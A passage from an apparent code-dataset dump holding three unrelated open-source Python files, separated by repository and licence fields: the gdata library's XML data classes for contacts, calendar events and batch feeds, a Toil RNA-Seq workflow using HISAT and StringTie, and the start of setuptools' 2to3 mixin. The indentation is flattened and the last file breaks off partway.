QUALITY_REL = 'http://schemas.google.com/g/2005#quality'
EVENT_REL = 'http://schemas.google.com/g/2005#event'
EVENT_ALTERNATE_REL = 'http://schemas.google.com/g/2005#event.alternate'
EVENT_PARKING_REL = 'http://schemas.google.com/g/2005#event.parking'
AIM_PROTOCOL = 'http://schemas.google.com/g/2005#AIM'
MSN_PROTOCOL = 'http://schemas.google.com/g/2005#MSN'
YAHOO_MESSENGER_PROTOCOL = 'http://schemas.google.com/g/2005#YAHOO'
SKYPE_PROTOCOL = 'http://schemas.google.com/g/2005#SKYPE'
QQ_PROTOCOL = 'http://schemas.google.com/g/2005#QQ'
GOOGLE_TALK_PROTOCOL = 'http://schemas.google.com/g/2005#GOOGLE_TALK'
ICQ_PROTOCOL = 'http://schemas.google.com/g/2005#ICQ'
JABBER_PROTOCOL = 'http://schemas.google.com/g/2005#JABBER'
REGULAR_COMMENTS = 'http://schemas.google.com/g/2005#regular'
REVIEW_COMMENTS = 'http://schemas.google.com/g/2005#reviews'
MAIL_BOTH = 'http://schemas.google.com/g/2005#both'
MAIL_LETTERS = 'http://schemas.google.com/g/2005#letters'
MAIL_PARCELS = 'http://schemas.google.com/g/2005#parcels'
MAIL_NEITHER = 'http://schemas.google.com/g/2005#neither'
GENERAL_ADDRESS = 'http://schemas.google.com/g/2005#general'
LOCAL_ADDRESS = 'http://schemas.google.com/g/2005#local'
OPTIONAL_ATENDEE = 'http://schemas.google.com/g/2005#event.optional'
REQUIRED_ATENDEE = 'http://schemas.google.com/g/2005#event.required'
ATTENDEE_ACCEPTED = 'http://schemas.google.com/g/2005#event.accepted'
ATTENDEE_DECLINED = 'http://schemas.google.com/g/2005#event.declined'
ATTENDEE_INVITED = 'http://schemas.google.com/g/2005#event.invited'
ATTENDEE_TENTATIVE = 'http://schemas.google.com/g/2005#event.tentative'
FULL_PROJECTION = 'full'
VALUES_PROJECTION = 'values'
BASIC_PROJECTION = 'basic'
PRIVATE_VISIBILITY = 'private'
PUBLIC_VISIBILITY = 'public'
OPAQUE_TRANSPARENCY = 'http://schemas.google.com/g/2005#event.opaque'
TRANSPARENT_TRANSPARENCY = 'http://schemas.google.com/g/2005#event.transparent'
CONFIDENTIAL_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.confidential'
DEFAULT_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.default'
PRIVATE_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.private'
PUBLIC_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.public'
CANCELED_EVENT_STATUS = 'http://schemas.google.com/g/2005#event.canceled'
CONFIRMED_EVENT_STATUS = 'http://schemas.google.com/g/2005#event.confirmed'
TENTATIVE_EVENT_STATUS = 'http://schemas.google.com/g/2005#event.tentative'
ACL_REL = 'http://schemas.google.com/acl/2007#accessControlList'
class Error(Exception):
pass
class MissingRequiredParameters(Error):
pass
class LinkFinder(atom.data.LinkFinder):
"""Mixin used in Feed and Entry classes to simplify link lookups by type.
Provides lookup methods for edit, edit-media, post, ACL and other special
links which are common across Google Data APIs.
"""
def find_html_link(self):
"""Finds the first link with rel of alternate and type of text/html."""
for link in self.link:
if link.rel == 'alternate' and link.type == 'text/html':
return link.href
return None
FindHtmlLink = find_html_link
def get_html_link(self):
for a_link in self.link:
if a_link.rel == 'alternate' and a_link.type == 'text/html':
return a_link
return None
GetHtmlLink = get_html_link
def find_post_link(self):
"""Get the URL to which new entries should be POSTed.
The POST target URL is used to insert new entries.
Returns:
A str for the URL in the link with a rel matching the POST type.
"""
return self.find_url('http://schemas.google.com/g/2005#post')
FindPostLink = find_post_link
def get_post_link(self):
return self.get_link('http://schemas.google.com/g/2005#post')
GetPostLink = get_post_link
def find_acl_link(self):
acl_link = self.get_acl_link()
if acl_link:
return acl_link.href
return None
FindAclLink = find_acl_link
def get_acl_link(self):
"""Searches for a link or feed_link (if present) with the rel for ACL."""
acl_link = self.get_link(ACL_REL)
if acl_link:
return acl_link
elif hasattr(self, 'feed_link'):
for a_feed_link in self.feed_link:
if a_feed_link.rel == ACL_REL:
return a_feed_link
return None
GetAclLink = get_acl_link
def find_feed_link(self):
return self.find_url('http://schemas.google.com/g/2005#feed')
FindFeedLink = find_feed_link
def get_feed_link(self):
return self.get_link('http://schemas.google.com/g/2005#feed')
GetFeedLink = get_feed_link
def find_previous_link(self):
return self.find_url('previous')
FindPreviousLink = find_previous_link
def get_previous_link(self):
return self.get_link('previous')
GetPreviousLink = get_previous_link
class TotalResults(atom.core.XmlElement):
"""opensearch:TotalResults for a GData feed."""
_qname = (OPENSEARCH_TEMPLATE_V1 % 'totalResults',
OPENSEARCH_TEMPLATE_V2 % 'totalResults')
class StartIndex(atom.core.XmlElement):
"""The opensearch:startIndex element in GData feed."""
_qname = (OPENSEARCH_TEMPLATE_V1 % 'startIndex',
OPENSEARCH_TEMPLATE_V2 % 'startIndex')
class ItemsPerPage(atom.core.XmlElement):
"""The opensearch:itemsPerPage element in GData feed."""
_qname = (OPENSEARCH_TEMPLATE_V1 % 'itemsPerPage',
OPENSEARCH_TEMPLATE_V2 % 'itemsPerPage')
class ExtendedProperty(atom.core.XmlElement):
"""The Google Data extendedProperty element.
Used to store arbitrary key-value information specific to your
application. The value can either be a text string stored as an XML
attribute (.value), or an XML node (XmlBlob) as a child element.
This element is used in the Google Calendar data API and the Google
Contacts data API.
"""
_qname = GDATA_TEMPLATE % 'extendedProperty'
name = 'name'
value = 'value'
def get_xml_blob(self):
"""Returns the XML blob as an atom.core.XmlElement.
Returns:
An XmlElement representing the blob's XML, or None if no
blob was set.
"""
if self._other_elements:
return self._other_elements[0]
else:
return None
GetXmlBlob = get_xml_blob
def set_xml_blob(self, blob):
"""Sets the contents of the extendedProperty to XML as a child node.
Since the extendedProperty is only allowed one child element as an XML
blob, setting the XML blob will erase any preexisting member elements
in this object.
Args:
blob: str or atom.core.XmlElement representing the XML blob stored in
the extendedProperty.
"""
# Erase any existing extension_elements, clears the child nodes from the
# extendedProperty.
if isinstance(blob, atom.core.XmlElement):
self._other_elements = [blob]
else:
self._other_elements = [atom.core.parse(str(blob))]
SetXmlBlob = set_xml_blob
class GDEntry(atom.data.Entry, LinkFinder):
"""Extends Atom Entry to provide data processing"""
etag = '{http://schemas.google.com/g/2005}etag'
def get_id(self):
if self.id is not None and self.id.text is not None:
return self.id.text.strip()
return None
GetId = get_id
def is_media(self):
if self.find_edit_media_link():
return True
return False
IsMedia = is_media
def find_media_link(self):
"""Returns the URL to the media content, if the entry is a media entry.
Otherwise returns None.
"""
if self.is_media():
return self.content.src
return None
FindMediaLink = find_media_link
class GDFeed(atom.data.Feed, LinkFinder):
"""A Feed from a GData service."""
etag = '{http://schemas.google.com/g/2005}etag'
total_results = TotalResults
start_index = StartIndex
items_per_page = ItemsPerPage
entry = [GDEntry]
def get_id(self):
if self.id is not None and self.id.text is not None:
return self.id.text.strip()
return None
GetId = get_id
def get_generator(self):
if self.generator and self.generator.text:
return self.generator.text.strip()
return None
class BatchId(atom.core.XmlElement):
"""Identifies a single operation in a batch request."""
_qname = BATCH_TEMPLATE % 'id'
class BatchOperation(atom.core.XmlElement):
"""The CRUD operation which this batch entry represents."""
_qname = BATCH_TEMPLATE % 'operation'
type = 'type'
class BatchStatus(atom.core.XmlElement):
"""The batch:status element present in a batch response entry.
A status element contains the code (HTTP response code) and
reason as elements. In a single request these fields would
be part of the HTTP response, but in a batch request each
Entry operation has a corresponding Entry in the response
feed which includes status information.
See http://code.google.com/apis/gdata/batch.html#Handling_Errors
"""
_qname = BATCH_TEMPLATE % 'status'
code = 'code'
reason = 'reason'
content_type = 'content-type'
class BatchEntry(GDEntry):
"""An atom:entry for use in batch requests.
The BatchEntry contains additional members to specify the operation to be
performed on this entry and a batch ID so that the server can reference
individual operations in the response feed. For more information, see:
http://code.google.com/apis/gdata/batch.html
"""
batch_operation = BatchOperation
batch_id = BatchId
batch_status = BatchStatus
class BatchInterrupted(atom.core.XmlElement):
"""The batch:interrupted element sent if batch request was interrupted.
Only appears in a feed if some of the batch entries could not be processed.
See: http://code.google.com/apis/gdata/batch.html#Handling_Errors
"""
_qname = BATCH_TEMPLATE % 'interrupted'
reason = 'reason'
success = 'success'
failures = 'failures'
parsed = 'parsed'
class BatchFeed(GDFeed):
"""A feed containing a list of batch request entries."""
interrupted = BatchInterrupted
entry = [BatchEntry]
def add_batch_entry(self, entry=None, id_url_string=None,
batch_id_string=None, operation_string=None):
"""Logic for populating members of a BatchEntry and adding to the feed.
If the entry is not a BatchEntry, it is converted to a BatchEntry so
that the batch specific members will be present.
The id_url_string can be used in place of an entry if the batch operation
applies to a URL. For example query and delete operations require just
the URL of an entry, no body is sent in the HTTP request. If an
id_url_string is sent instead of an entry, a BatchEntry is created and
added to the feed.
This method also assigns the desired batch id to the entry so that it
can be referenced in the server's response. If the batch_id_string is
None, this method will assign a batch_id to be the index at which this
entry will be in the feed's entry list.
Args:
entry: BatchEntry, atom.data.Entry, or another Entry flavor (optional)
The entry which will be sent to the server as part of the batch
request. The item must have a valid atom id so that the server
knows which entry this request references.
id_url_string: str (optional) The URL of the entry to be acted on. You
can find this URL in the text member of the atom id for an entry.
If an entry is not sent, this id will be used to construct a new
BatchEntry which will be added to the request feed.
batch_id_string: str (optional) The batch ID to be used to reference
this batch operation in the results feed. If this parameter is None,
the current length of the feed's entry array will be used as a
count. Note that batch_ids should either always be specified or
never, mixing could potentially result in duplicate batch ids.
operation_string: str (optional) The desired batch operation which will
set the batch_operation.type member of the entry. Options are
'insert', 'update', 'delete', and 'query'
Raises:
MissingRequiredParameters: Raised if neither an id_ url_string nor an
entry are provided in the request.
Returns:
The added entry.
"""
if entry is None and id_url_string is None:
raise MissingRequiredParameters('supply either an entry or URL string')
if entry is None and id_url_string is not None:
entry = BatchEntry(id=atom.data.Id(text=id_url_string))
if batch_id_string is not None:
entry.batch_id = BatchId(text=batch_id_string)
elif entry.batch_id is None or entry.batch_id.text is None:
entry.batch_id = BatchId(text=str(len(self.entry)))
if operation_string is not None:
entry.batch_operation = BatchOperation(type=operation_string)
self.entry.append(entry)
return entry
AddBatchEntry = add_batch_entry
def add_insert(self, entry, batch_id_string=None):
"""Add an insert request to the operations in this batch request feed.
If the entry doesn't yet have an operation or a batch id, these will
be set to the insert operation and a batch_id specified as a parameter.
Args:
entry: BatchEntry The entry which will be sent in the batch feed as an
insert request.
batch_id_string: str (optional) The batch ID to be used to reference
this batch operation in the results feed. If this parameter is None,
the current length of the feed's entry array will be used as a
count. Note that batch_ids should either always be specified or
never, mixing could potentially result in duplicate batch ids.
"""
self.add_batch_entry(entry=entry, batch_id_string=batch_id_string,
operation_string=BATCH_INSERT)
AddInsert = add_insert
def add_update(self, entry, batch_id_string=None):
"""Add an update request to the list of batch operations in this feed.
Sets the operation type of the entry to insert if it is not already set
and assigns the desired batch id to the entry so that it can be
referenced in the server's response.
Args:
entry: BatchEntry The entry which will be sent to the server as an
update (HTTP PUT) request. The item must have a valid atom id
so that the server knows which entry to replace.
batch_id_string: str (optional) The batch ID to be used to reference
this batch operation in the results feed. If this parameter is None,
the current length of the feed's entry array will be used as a
count. See also comments for AddInsert.
"""
self.add_batch_entry(entry=entry, batch_id_string=batch_id_string,
operation_string=BATCH_UPDATE)
AddUpdate = add_update
def add_delete(self, url_string=None, entry=None, batch_id_string=None):
"""Adds a delete request to the batch request feed.
This method takes either the url_string which is the atom id of the item
to be deleted, or the entry itself. The atom id of the entry must be
present so that the server knows which entry should be deleted.
Args:
url_string: str (optional) The URL of the entry to be deleted. You can
find this URL in the text member of the atom id for an entry.
entry: BatchEntry (optional) The entry to be deleted.
batch_id_string: str (optional)
Raises:
MissingRequiredParameters: Raised if neither a url_string nor an entry
are provided in the request.
"""
self.add_batch_entry(entry=entry, id_url_string=url_string,
batch_id_string=batch_id_string, operation_string=BATCH_DELETE)
AddDelete = add_delete
def add_query(self, url_string=None, entry=None, batch_id_string=None):
"""Adds a query request to the batch request feed.
This method takes either the url_string which is the query URL
whose results will be added to the result feed. The query URL will
be encapsulated in a BatchEntry, and you may pass in the BatchEntry
with a query URL instead of sending a url_string.
Args:
url_string: str (optional)
entry: BatchEntry (optional)
batch_id_string: str (optional)
Raises:
MissingRequiredParameters
"""
self.add_batch_entry(entry=entry, id_url_string=url_string,
batch_id_string=batch_id_string, operation_string=BATCH_QUERY)
AddQuery = add_query
def find_batch_link(self):
return self.find_url('http://schemas.google.com/g/2005#batch')
FindBatchLink = find_batch_link
class EntryLink(atom.core.XmlElement):
"""The gd:entryLink element.
Represents a logically nested entry. For example, a <gd:who>
representing a contact might have a nested entry from a contact feed.
"""
_qname = GDATA_TEMPLATE % 'entryLink'
entry = GDEntry
rel = 'rel'
read_only = 'readOnly'
href = 'href'
class FeedLink(atom.core.XmlElement):
"""The gd:feedLink element.
Represents a logically nested feed. For example, a calendar feed might
have a nested feed representing all comments on entries.
"""
_qname = GDATA_TEMPLATE % 'feedLink'
feed = GDFeed
rel = 'rel'
read_only = 'readOnly'
count_hint = 'countHint'
href = 'href'
class AdditionalName(atom.core.XmlElement):
"""The gd:additionalName element.
Specifies additional (eg. middle) name of the person.
Contains an attribute for the phonetic representaton of the name.
"""
_qname = GDATA_TEMPLATE % 'additionalName'
yomi = 'yomi'
class Comments(atom.core.XmlElement):
"""The gd:comments element.
Contains a comments feed for the enclosing entry (such as a calendar event).
"""
_qname = GDATA_TEMPLATE % 'comments'
rel = 'rel'
feed_link = FeedLink
class Country(atom.core.XmlElement):
"""The gd:country element.
Country name along with optional country code. The country code is
given in accordance with ISO 3166-1 alpha-2:
http://www.iso.org/iso/iso-3166-1_decoding_table
"""
_qname = GDATA_TEMPLATE % 'country'
code = 'code'
class EmailImParent(atom.core.XmlElement):
address = 'address'
label = 'label'
rel = 'rel'
primary = 'primary'
class Email(EmailImParent):
"""The gd:email element.
An email address associated with the containing entity (which is
usually an entity representing a person or a location).
"""
_qname = GDATA_TEMPLATE % 'email'
display_name = 'displayName'
class FamilyName(atom.core.XmlElement):
"""The gd:familyName element.
Specifies family name of the person, eg. "Smith".
"""
_qname = GDATA_TEMPLATE % 'familyName'
yomi = 'yomi'
class Im(EmailImParent):
"""The gd:im element.
An instant messaging address associated with the containing entity.
"""
_qname = GDATA_TEMPLATE % 'im'
protocol = 'protocol'
class GivenName(atom.core.XmlElement):
"""The gd:givenName element.
Specifies given name of the person, eg. "John".
"""
_qname = GDATA_TEMPLATE % 'givenName'
yomi = 'yomi'
class NamePrefix(atom.core.XmlElement):
"""The gd:namePrefix element.
Honorific prefix, eg. 'Mr' or 'Mrs'.
"""
_qname = GDATA_TEMPLATE % 'namePrefix'
class NameSuffix(atom.core.XmlElement):
"""The gd:nameSuffix element.
Honorific suffix, eg. 'san' or 'III'.
"""
_qname = GDATA_TEMPLATE % 'nameSuffix'
class FullName(atom.core.XmlElement):
"""The gd:fullName element.
Unstructured representation of the name.
"""
_qname = GDATA_TEMPLATE % 'fullName'
class Name(atom.core.XmlElement):
"""The gd:name element.
Allows storing person's name in a structured way. Consists of
given name, additional name, family name, prefix, suffix and full name.
"""
_qname = GDATA_TEMPLATE % 'name'
given_name = GivenName
additional_name = AdditionalName
family_name = FamilyName
name_prefix = NamePrefix
name_suffix = NameSuffix
full_name = FullName
class OrgDepartment(atom.core.XmlElement):
"""The gd:orgDepartment element.
Describes a department within an organization. Must appear within a
gd:organization element.
"""
_qname = GDATA_TEMPLATE % 'orgDepartment'
class OrgJobDescription(atom.core.XmlElement):
"""The gd:orgJobDescription element.
Describes a job within an organization. Must appear within a
gd:organization element.
"""
_qname = GDATA_TEMPLATE % 'orgJobDescription'
class OrgName(atom.core.XmlElement):
"""The gd:orgName element.
The name of the organization. Must appear within a gd:organization
element.
Contains a Yomigana attribute (Japanese reading aid) for the
organization name.
"""
_qname = GDATA_TEMPLATE % 'orgName'
yomi = 'yomi'
class OrgSymbol(atom.core.XmlElement):
"""The gd:orgSymbol element.
Provides a symbol of an organization. Must appear within a
gd:organization element.
"""
_qname = GDATA_TEMPLATE % 'orgSymbol'
class OrgTitle(atom.core.XmlElement):
"""The gd:orgTitle element.
The title of a person within an organization. Must appear within a
gd:organization element.
"""
_qname = GDATA_TEMPLATE % 'orgTitle'
class Organization(atom.core.XmlElement):
"""The gd:organization element.
An organization, typically associated with a contact.
"""
_qname = GDATA_TEMPLATE % 'organization'
label = 'label'
primary = 'primary'
rel = 'rel'
department = OrgDepartment
job_description = OrgJobDescription
name = OrgName
symbol = OrgSymbol
title = OrgTitle
class When(atom.core.XmlElement):
"""The gd:when element.
Represents a period of time or an instant.
"""
_qname = GDATA_TEMPLATE % 'when'
end = 'endTime'
start = 'startTime'
value = 'valueString'
class OriginalEvent(atom.core.XmlElement):
"""The gd:originalEvent element.
Equivalent to the Recurrence ID property specified in section 4.8.4.4
of RFC 2445. Appears in every instance of a recurring event, to identify
the original event.
Contains a <gd:when> element specifying the original start time of the
instance that has become an exception.
"""
_qname = GDATA_TEMPLATE % 'originalEvent'
id = 'id'
href = 'href'
when = When
class PhoneNumber(atom.core.XmlElement):
"""The gd:phoneNumber element.
A phone number associated with the containing entity (which is usually
an entity representing a person or a location).
"""
_qname = GDATA_TEMPLATE % 'phoneNumber'
label = 'label'
rel = 'rel'
uri = 'uri'
primary = 'primary'
class PostalAddress(atom.core.XmlElement):
"""The gd:postalAddress element."""
_qname = GDATA_TEMPLATE % 'postalAddress'
label = 'label'
rel = 'rel'
uri = 'uri'
primary = 'primary'
class Rating(atom.core.XmlElement):
"""The gd:rating element.
Represents a numeric rating of the enclosing entity, such as a
comment. Each rating supplies its own scale, although it may be
normalized by a service; for example, some services might convert all
ratings to a scale from 1 to 5.
"""
_qname = GDATA_TEMPLATE % 'rating'
average = 'average'
max = 'max'
min = 'min'
num_raters = 'numRaters'
rel = 'rel'
value = 'value'
class Recurrence(atom.core.XmlElement):
"""The gd:recurrence element.
Represents the dates and times when a recurring event takes place.
The string that defines the recurrence consists of a set of properties,
each of which is defined in the iCalendar standard (RFC 2445).
Specifically, the string usually begins with a DTSTART property that
indicates the starting time of the first instance of the event, and
often a DTEND property or a DURATION property to indicate when the
first instance ends. Next come RRULE, RDATE, EXRULE, and/or EXDATE
properties, which collectively define a recurring event and its
exceptions (but see below). (See section 4.8.5 of RFC 2445 for more
information about these recurrence component properties.) Last comes a
VTIMEZONE component, providing detailed timezone rules for any timezone
ID mentioned in the preceding properties.
Google services like Google Calendar don't generally generate EXRULE
and EXDATE properties to represent exceptions to recurring events;
instead, they generate <gd:recurrenceException> elements. However,
Google services may include EXRULE and/or EXDATE properties anyway;
for example, users can import events and exceptions into Calendar, and
if those imported events contain EXRULE or EXDATE properties, then
Calendar will provide those properties when it sends a <gd:recurrence>
element.
Note the the use of <gd:recurrenceException> means that you can't be
sure just from examining a <gd:recurrence> element whether there are
any exceptions to the recurrence description. To ensure that you find
all exceptions, look for <gd:recurrenceException> elements in the feed,
and use their <gd:originalEvent> elements to match them up with
<gd:recurrence> elements.
"""
_qname = GDATA_TEMPLATE % 'recurrence'
class RecurrenceException(atom.core.XmlElement):
"""The gd:recurrenceException element.
Represents an event that's an exception to a recurring event-that is,
an instance of a recurring event in which one or more aspects of the
recurring event (such as attendance list, time, or location) have been
changed.
Contains a <gd:originalEvent> element that specifies the original
recurring event that this event is an exception to.
When you change an instance of a recurring event, that instance becomes
an exception. Depending on what change you made to it, the exception
behaves in either of two different ways when the original recurring
event is changed:
- If you add, change, or remove comments, attendees, or attendee
responses, then the exception remains tied to the original event, and
changes to the original event also change the exception.
- If you make any other changes to the exception (such as changing the
time or location) then the instance becomes "specialized," which means
that it's no longer as tightly tied to the original event. If you
change the original event, specialized exceptions don't change. But
see below.
For example, say you have a meeting every Tuesday and Thursday at
2:00 p.m. If you change the attendance list for this Thursday's meeting
(but not for the regularly scheduled meeting), then it becomes an
exception. If you change the time for this Thursday's meeting (but not
for the regularly scheduled meeting), then it becomes specialized.
Regardless of whether an exception is specialized or not, if you do
something that deletes the instance that the exception was derived from,
then the exception is deleted. Note that changing the day or time of a
recurring event deletes all instances, and creates new ones.
For example, after you've specialized this Thursday's meeting, say you
change the recurring meeting to happen on Monday, Wednesday, and Friday.
That change deletes all of the recurring instances of the
Tuesday/Thursday meeting, including the specialized one.
If a particular instance of a recurring event is deleted, then that
instance appears as a <gd:recurrenceException> containing a
<gd:entryLink> that has its <gd:eventStatus> set to
"http://schemas.google.com/g/2005#event.canceled". (For more
information about canceled events, see RFC 2445.)
"""
_qname = GDATA_TEMPLATE % 'recurrenceException'
specialized = 'specialized'
entry_link = EntryLink
original_event = OriginalEvent
class Reminder(atom.core.XmlElement):
"""The gd:reminder element.
A time interval, indicating how long before the containing entity's start
time or due time attribute a reminder should be issued. Alternatively,
may specify an absolute time at which a reminder should be issued. Also
specifies a notification method, indicating what medium the system
should use to remind the user.
"""
_qname = GDATA_TEMPLATE % 'reminder'
absolute_time = 'absoluteTime'
method = 'method'
days = 'days'
hours = 'hours'
minutes = 'minutes'
class Transparency(atom.core.XmlElement):
"""The gd:transparency element:
Extensible enum corresponding to the TRANSP property defined in RFC 244.
"""
_qname = GDATA_TEMPLATE % 'transparency'
value = 'value'
class Agent(atom.core.XmlElement):
"""The gd:agent element.
The agent who actually receives the mail. Used in work addresses.
Also for 'in care of' or 'c/o'.
"""
_qname = GDATA_TEMPLATE % 'agent'
class HouseName(atom.core.XmlElement):
"""The gd:housename element.
Used in places where houses or buildings have names (and not
necessarily numbers), eg. "The Pillars".
"""
_qname = GDATA_TEMPLATE % 'housename'
class Street(atom.core.XmlElement):
"""The gd:street element.
Can be street, avenue, road, etc. This element also includes the
house number and room/apartment/flat/floor number.
"""
_qname = GDATA_TEMPLATE % 'street'
class PoBox(atom.core.XmlElement):
"""The gd:pobox element.
Covers actual P.O. boxes, drawers, locked bags, etc. This is usually
but not always mutually exclusive with street.
"""
_qname = GDATA_TEMPLATE % 'pobox'
class Neighborhood(atom.core.XmlElement):
"""The gd:neighborhood element.
This is used to disambiguate a street address when a city contains more
than one street with the same name, or to specify a small place whose
mail is routed through a larger postal town. In China it could be a
county or a minor city.
"""
_qname = GDATA_TEMPLATE % 'neighborhood'
class City(atom.core.XmlElement):
"""The gd:city element.
Can be city, village, town, borough, etc. This is the postal town and
not necessarily the place of residence or place of business.
"""
_qname = GDATA_TEMPLATE % 'city'
class Subregion(atom.core.XmlElement):
"""The gd:subregion element.
Handles administrative districts such as U.S. or U.K. counties that are
not used for mail addressing purposes. Subregion is not intended for
delivery addresses.
"""
_qname = GDATA_TEMPLATE % 'subregion'
class Region(atom.core.XmlElement):
"""The gd:region element.
A state, province, county (in Ireland), Land (in Germany),
departement (in France), etc.
"""
_qname = GDATA_TEMPLATE % 'region'
class Postcode(atom.core.XmlElement):
"""The gd:postcode element.
Postal code. Usually country-wide, but sometimes specific to the
city (e.g. "2" in "Dublin 2, Ireland" addresses).
"""
_qname = GDATA_TEMPLATE % 'postcode'
class Country(atom.core.XmlElement):
"""The gd:country element.
The name or code of the country.
"""
_qname = GDATA_TEMPLATE % 'country'
class FormattedAddress(atom.core.XmlElement):
"""The gd:formattedAddress element.
The full, unstructured postal address.
"""
_qname = GDATA_TEMPLATE % 'formattedAddress'
class StructuredPostalAddress(atom.core.XmlElement):
"""The gd:structuredPostalAddress element.
Postal address split into components. It allows to store the address
in locale independent format. The fields can be interpreted and used
to generate formatted, locale dependent address. The following elements
reperesent parts of the address: agent, house name, street, P.O. box,
neighborhood, city, subregion, region, postal code, country. The
subregion element is not used for postal addresses, it is provided for
extended uses of addresses only. In order to store postal address in an
unstructured form formatted address field is provided.
"""
_qname = GDATA_TEMPLATE % 'structuredPostalAddress'
rel = 'rel'
mail_class = 'mailClass'
usage = 'usage'
label = 'label'
primary = 'primary'
agent = Agent
house_name = HouseName
street = Street
po_box = PoBox
neighborhood = Neighborhood
city = City
subregion = Subregion
region = Region
postcode = Postcode
country = Country
formatted_address = FormattedAddress
class Where(atom.core.XmlElement):
"""The gd:where element.
A place (such as an event location) associated with the containing
entity. The type of the association is determined by the rel attribute;
the details of the location are contained in an embedded or linked-to
Contact entry.
A <gd:where> element is more general than a <gd:geoPt> element. The
former identifies a place using a text description and/or a Contact
entry, while the latter identifies a place using a specific geographic
location.
"""
_qname = GDATA_TEMPLATE % 'where'
label = 'label'
rel = 'rel'
value = 'valueString'
entry_link = EntryLink
class AttendeeType(atom.core.XmlElement):
"""The gd:attendeeType element."""
_qname = GDATA_TEMPLATE % 'attendeeType'
value = 'value'
class AttendeeStatus(atom.core.XmlElement):
"""The gd:attendeeStatus element."""
_qname = GDATA_TEMPLATE % 'attendeeStatus'
value = 'value'
class EventStatus(atom.core.XmlElement):
"""The gd:eventStatus element."""
_qname = GDATA_TEMPLATE % 'eventStatus'
value = 'value'
class Visibility(atom.core.XmlElement):
"""The gd:visibility element."""
_qname = GDATA_TEMPLATE % 'visibility'
value = 'value'
class Who(atom.core.XmlElement):
"""The gd:who element.
A person associated with the containing entity. The type of the
association is determined by the rel attribute; the details about the
person are contained in an embedded or linked-to Contact entry.
The <gd:who> element can be used to specify email senders and
recipients, calendar event organizers, and so on.
"""
_qname = GDATA_TEMPLATE % 'who'
email = 'email'
rel = 'rel'
value = 'valueString'
attendee_status = AttendeeStatus
attendee_type = AttendeeType
entry_link = EntryLink
class Deleted(atom.core.XmlElement):
"""gd:deleted when present, indicates the containing entry is deleted."""
_qname = GD_TEMPLATE % 'deleted'
class Money(atom.core.XmlElement):
"""Describes money"""
_qname = GD_TEMPLATE % 'money'
amount = 'amount'
currency_code = 'currencyCode'
class MediaSource(object):
"""GData Entries can refer to media sources, so this class provides a
place to store references to these objects along with some metadata.
"""
def __init__(self, file_handle=None, content_type=None, content_length=None,
file_path=None, file_name=None):
"""Creates an object of type MediaSource.
Args:
file_handle: A file handle pointing to the file to be encapsulated in the
MediaSource.
content_type: string The MIME type of the file. Required if a file_handle
is given.
content_length: int The size of the file. Required if a file_handle is
given.
file_path: string (optional) A full path name to the file. Used in
place of a file_handle.
file_name: string The name of the file without any path information.
Required if a file_handle is given.
"""
self.file_handle = file_handle
self.content_type = content_type
self.content_length = content_length
self.file_name = file_name
if (file_handle is None and content_type is not None and
file_path is not None):
self.set_file_handle(file_path, content_type)
def set_file_handle(self, file_name, content_type):
"""A helper function which can create a file handle from a given filename
and set the content type and length all at once.
Args:
file_name: string The path and file name to the file containing the media
content_type: string A MIME type representing the type of the media
"""
self.file_handle = open(file_name, 'rb')
self.content_type = content_type
self.content_length = os.path.getsize(file_name)
self.file_name = os.path.basename(file_name)
SetFileHandle = set_file_handle
def modify_request(self, http_request):
http_request.add_body_part(self.file_handle, self.content_type,
self.content_length)
return http_request
ModifyRequest = modify_request
| mit |
dgaston/ddb-ngsflow-scripts | defunct/workflow-KSHV_RNA-Seq_HiSat_StringTie.py | 3 | 2892 | #!/usr/bin/env python
# Standard packages
import os
import sys
import argparse
# Third-party packages
from toil.job import Job
# Package methods
from ddb import configuration
from ddb_ngsflow import pipeline
from ddb_ngsflow.rna import hisat
from ddb_ngsflow.rna import stringtie
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--samples_file', help="Input configuration file for samples")
parser.add_argument('-c', '--configuration', help="Configuration file for various settings")
Job.Runner.addToilOptions(parser)
args = parser.parse_args()
args.logLevel = "INFO"
sys.stdout.write("Parsing configuration data\n")
config = configuration.configure_runtime(args.configuration)
sys.stdout.write("Parsing sample data\n")
samples = configuration.configure_samples(args.samples_file, config)
# Workflow Graph definition. The following workflow definition should create a valid Directed Acyclic Graph (DAG)
root_job = Job.wrapJobFn(pipeline.spawn_batch_jobs, cores=1)
transcripts_list = list()
flags = ["keep_retained", "max_intron", "stranded"]
# Per sample jobs
for sample in samples:
# Alignment and Refinement Stages
align_job = Job.wrapJobFn(hisat.hisat_unpaired, config, sample, samples, flags,
cores=int(config['hisat']['num_cores']),
memory="{}G".format(config['hisat']['max_mem']))
samples[sample]['bam'] = "{}.hisat.sorted.bam".format(sample)
initial_st_job = Job.wrapJobFn(stringtie.stringtie_first, config, sample, samples, flags,
cores=int(config['stringtie']['num_cores']),
memory="{}G".format(config['stringtie']['max_mem']))
transcripts_list.append("{}.stringtie_first.gtf".format(sample))
# Create workflow from created jobs
root_job.addChild(align_job)
align_job.addChild(initial_st_job)
transcripts_list_string = " ".join(transcripts_list)
merge_job = Job.wrapJobFn(stringtie.stringtie_merge, config, samples, flags, transcripts_list_string,
cores=int(config['stringtie']['num_cores']),
memory="{}G".format(config['stringtie']['max_mem']))
root_job.addFollowOn(merge_job)
config['merged_transcript_reference'] = "{}.stringtie.merged.gtf".format(config['run_id'])
for sample in samples:
stringtie_job = Job.wrapJobFn(stringtie.stringtie, config, sample, samples, flags,
cores=int(config['stringtie']['num_cores']),
memory="{}G".format(config['stringtie']['max_mem']))
merge_job.addChild(stringtie_job)
# Start workflow execution
Job.Runner.startToil(root_job, args)
| mit |
alexzoo/python | selenium_tests/env/lib/python3.6/site-packages/setuptools/lib2to3_ex.py | 418 | 2013 | """
Customized Mixin2to3 support:
- adds support for converting doctests
This module raises an ImportError on Python 2.
"""
from distutils.util import Mixin2to3 as _Mixin2to3
from distutils import log
from lib2to3.refactor import RefactoringTool, get_fixers_from_package
import setuptools
class DistutilsRefactoringTool(RefactoringTool):
def log_error(self, msg, *args, **kw):
log.error(msg, *args)
def log_message(self, msg, *args):
log.info(msg, *args)
def log_debug(self, msg, *args):
log.debug(msg, *args)
class Mixin2to3(_Mixin2to3):
def run_2to3(self, files, doctests=False):
# See of the distribution option has been set, otherwise check the
# setuptools default.
if self.distribution.use_2to3 is not True:
return
if not files:
return
